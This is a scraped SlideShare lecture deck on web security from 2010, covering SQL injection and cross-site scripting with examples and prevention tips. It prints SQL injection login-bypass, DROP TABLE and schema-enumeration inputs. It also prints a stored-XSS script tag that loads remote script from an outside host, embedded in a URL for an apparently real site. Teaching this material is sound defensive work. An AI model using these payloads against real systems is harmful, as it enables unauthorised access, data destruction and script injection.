SlideShare a Scribd company logo
Software Security
What is software Security?
•

Application security encompasses measures taken
throughout the application's life-cycle to prevent
exceptions in the security policy of an application or the
underlying system (vulnerabilities) through flaws in the
design, development, deployment, upgrade, or
maintenance of the application, .
Why Software security is important?


Leakage of Sensitive data.



Crash of entire application or database.





Fixing issues after the attack will be more expensive
and time consuming.
Quality of the product.
Common vulnerabilities in web
application


SQL Injection



Cross-Site Scripting(XSS)



Buffer overflows



HTTP response splitting
2010 statistics of web Vulnerability
What is SQL injection?


SQL injection is a code injection technique that
exploits a security vulnerability occurring in the
database layer of an application. The vulnerability is
present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL
statements or user input is not strongly typed and
thereby unexpectedly executed.
How it works?
Demonstration
Web security 2010
Web security 2010
Login using SQL injection


"SELECT * FROM users WHERE name = ' " + userName + " '
AND password = ' “+Password+“ ';"


a' or 't'='t



1' or 1=1


SELECT * FROM users WHERE name = ' ' AND

password = ' ' ;








SELECT * FROM users WHERE name = 'admin' AND password
= 'pass123' ;
SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND
password = ' a' OR 't'='t ';
SELECT * FROM users WHERE name = ' a' OR 't'='t ' AND
password = ' a' OR 't'='t ';
DROP TABLE users; - -';
More exploits using SQL injection




SELECT TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES
SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME='customers'
XSS( Cross-Site Scripting)
Cross-site Scripting


Cross-site scripting (XSS) is a type of computer
security vulnerability typically found in web
applications that enables malicious attackers to
inject client-side script into web pages viewed by
other users.
How it works
Script Injection








Same as before, but instead of placing code in URL, script code is
saved on the application website and stored in database using their
own non-validated forms
When that data is retrieved from database and users load that webpage
the code executes and attack occurs
User would never know the code was executed without viewing the
source of each webpage, since the link looks valid
The application website owner is potentially liable since the attack
code is stored on their site
Web security 2010
Web security 2010
Web security 2010


<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
http://www.easydoc.com.au/test/personalprofile.action
?address1=
&suburb=
&state=
&zipcode=1
&homePhone=
&mobilenumber=
&reminderOption=0
&title=Dr
&firstname=<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
&lastname=Doctor
&photoupload=
&smsOption=0
&type=GP
&reqNo=82
Preventing SQL injection and XSS


SCRUB Error handling
Error messages divulge information that can be used by hacker



VALIDATE all user entered parameters



CHECK data types and lengths



DISALLOW unwanted data (e.g. HTML tags, JavaScript)



ESCAPE questionable characters (ticks, --,semi-colon, brackets, etc.)
Thank You

More Related Content

PPTX
Sql injections (Basic bypass authentication)
Ravindra Singh Rathore
 
PPTX
Sql injection
Manjushree Mashal
 
PPTX
Application security [appsec]
Judy Ngure
 
PPTX
OWASP
gehad hamdy
 
PPTX
Owasp first5 presentation
Ashwini Paranjpe
 
PPTX
Secure Code Warrior - Trust no input
Secure Code Warrior
 
PPTX
Owasp top 10 2017
ibrahimumer2
 
PDF
Testing Web Application Security
Ted Husted
 
Sql injections (Basic bypass authentication)
Ravindra Singh Rathore
 
Sql injection
Manjushree Mashal
 
Application security [appsec]
Judy Ngure
 
Owasp first5 presentation
Ashwini Paranjpe
 
Secure Code Warrior - Trust no input
Secure Code Warrior
 
Owasp top 10 2017
ibrahimumer2
 
Testing Web Application Security
Ted Husted
 

What's hot (20)

PPTX
Injection flaws
DANISH INAMDAR
 
PPT
Web Application Security
Colin English
 
PPT
Get Ready for Web Application Security Testing
Alan Kan
 
PPTX
OWASP -Top 5 Jagjit
Jagjit Singh Brar
 
PPTX
Secure Code Warrior - Defense in depth
Secure Code Warrior
 
PPTX
Web application attacks
hruth
 
PDF
Web Application Security 101
Cybersecurity Education and Research Centre
 
PPTX
Analysis of Field Data on Web Security Vulnerabilities
KaashivInfoTech Company
 
PDF
Web Application Security Tips
tcellsn
 
PDF
Security Awareness
Lucas Hendrich
 
PPTX
A7 Missing Function Level Access Control
stevil1224
 
PPTX
Security Testing For Web Applications
Vladimir Soghoyan
 
DOC
SalemPhilip_ResearchReport
Philip Salem
 
PPTX
OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
PPTX
Web Security
Rita Mehra
 
PDF
Owasp Top 10-2013
n|u - The Open Security Community
 
PDF
C01461422
IOSR Journals
 
PPTX
Owasp web security
Pankaj Kumar Sharma
 
PDF
The Complete Web Application Security Testing Checklist
Cigital
 
PDF
What Should Go Into A Web Application Penetration Testing Checklist?
Hacker Combat
 
Injection flaws
DANISH INAMDAR
 
Web Application Security
Colin English
 
Get Ready for Web Application Security Testing
Alan Kan
 
OWASP -Top 5 Jagjit
Jagjit Singh Brar
 
Secure Code Warrior - Defense in depth
Secure Code Warrior
 
Web application attacks
hruth
 
Web Application Security 101
Cybersecurity Education and Research Centre
 
Analysis of Field Data on Web Security Vulnerabilities
KaashivInfoTech Company
 
Web Application Security Tips
tcellsn
 
Security Awareness
Lucas Hendrich
 
A7 Missing Function Level Access Control
stevil1224
 
Security Testing For Web Applications
Vladimir Soghoyan
 
SalemPhilip_ResearchReport
Philip Salem
 
OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
Web Security
Rita Mehra
 
C01461422
IOSR Journals
 
Owasp web security
Pankaj Kumar Sharma
 
The Complete Web Application Security Testing Checklist
Cigital
 
What Should Go Into A Web Application Penetration Testing Checklist?
Hacker Combat
 
Ad

Similar to Web security 2010 (20)

PPTX
ASP.NET Web Security
SharePointRadi
 
DOCX
gpt.AI.docx
ssuser233ed8
 
PDF
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
ODT
Sql injection
Ashok Kumar
 
PDF
IRJET - SQL Injection: Attack & Mitigation
IRJET Journal
 
PPTX
Identifying and Eradicating Web Application Vulnerabilities : Cyber Security ...
Boston Institute of Analytics
 
PPSX
Web application security
www.netgains.org
 
PDF
Sql Injection and XSS
Mike Crabb
 
PPTX
SQL Injection and Clickjacking Attack in Web security
Moutasm Tamimi
 
PDF
Seminar2015Bilic_Nicole
Nicole Bili?
 
PPT
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
PDF
SQL Injection Prevention by Adaptive Algorithm
IOSR Journals
 
PDF
E017131924
IOSR Journals
 
PDF
Security vulnerabilities related to web-based data
TELKOMNIKA JOURNAL
 
PDF
Top 10 Web App Security Risks
Sperasoft
 
PPT
WebApps_Lecture_15.ppt
OmprakashVerma56
 
PPTX
Web and Mobile Application Security
Prateek Jain
 
PPTX
Securing the Web @RivieraDev2016
Sumanth Damarla
 
PDF
Study of Web Application Attacks & Their Countermeasures
idescitation
 
ASP.NET Web Security
SharePointRadi
 
gpt.AI.docx
ssuser233ed8
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Ivan Ortega
 
Sql injection
Ashok Kumar
 
IRJET - SQL Injection: Attack & Mitigation
IRJET Journal
 
Identifying and Eradicating Web Application Vulnerabilities : Cyber Security ...
Boston Institute of Analytics
 
Web application security
www.netgains.org
 
Sql Injection and XSS
Mike Crabb
 
SQL Injection and Clickjacking Attack in Web security
Moutasm Tamimi
 
Seminar2015Bilic_Nicole
Nicole Bili?
 
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
SQL Injection Prevention by Adaptive Algorithm
IOSR Journals
 
E017131924
IOSR Journals
 
Security vulnerabilities related to web-based data
TELKOMNIKA JOURNAL
 
Top 10 Web App Security Risks
Sperasoft
 
WebApps_Lecture_15.ppt
OmprakashVerma56
 
Web and Mobile Application Security
Prateek Jain
 
Securing the Web @RivieraDev2016
Sumanth Damarla
 
Study of Web Application Attacks & Their Countermeasures
idescitation
 
Ad

Recently uploaded (20)

PDF
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
PPTX
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
PPTX
IT Runs Better with ThousandEyes AI-driven Assurance
ThousandEyes
 
PPTX
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
PDF
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
PDF
Doc9.....................................
SofiaCollazos
 
PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PPTX
The Future of AI & Machine Learning.pptx
pritsen4700
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
PDF
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PPTX
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
PDF
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
PDF
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
PDF
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PPTX
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
IT Runs Better with ThousandEyes AI-driven Assurance
ThousandEyes
 
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
Doc9.....................................
SofiaCollazos
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
The Future of AI & Machine Learning.pptx
pritsen4700
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
Agile Chennai 18-19 July 2025 | Emerging patterns in Agentic AI by Bharani Su...
AgileNetwork
 
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 

Web security 2010